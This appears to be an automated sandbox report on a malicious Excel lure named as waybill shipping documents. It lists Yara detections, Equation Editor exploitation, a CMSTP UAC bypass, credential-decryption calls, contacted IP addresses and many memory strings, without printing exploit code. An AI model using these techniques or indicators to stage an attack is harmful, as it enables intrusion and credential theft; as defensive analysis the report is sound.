Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED

Machine Learning detection for sample

Source: waybill_shipping_documents_original_BL_CI&PL_26_07_2024_00000000_doc.xls

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 16_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,		16_2_00433837
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 18_2_00404423 FreeLibrary,CryptUnprotectData,		18_2_00404423

Source: powershell.exe, 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_a8bc7cc4-8

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3329a80.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.powershell.exe.3bc7e48.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.957036685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.454070604.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3832, type: MEMORYSTR

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.45.34 Port: 80

Jump to behavior

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr	Stream path '_1783482512/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr	Stream path '_1783482515/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr	Stream path '_1783482536/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr	Stream path '_1783482537/\x1CompObj' : ...................F....Microsoft Equation 3.0....
Source: ~WRF{E4A5FB01-995F-4785-9031-8AAEF937D825}.tmp.3.dr	Stream path '_1783482540/\x1CompObj' : ...................F....Microsoft Equation 3.0....

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 16_2_004074FD _wcslen,CoGetObject,

16_2_004074FD

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49171 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49178 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49179 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49180 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49182 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49162 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.22:49190 version: TLS 1.2

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdbsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\ source: powershell.exe, 00000016.00000002.965643789.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.457052383.0000000006150000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.454070604.0000000003329000.00000004.00000800.00020000.00000000.sdmp
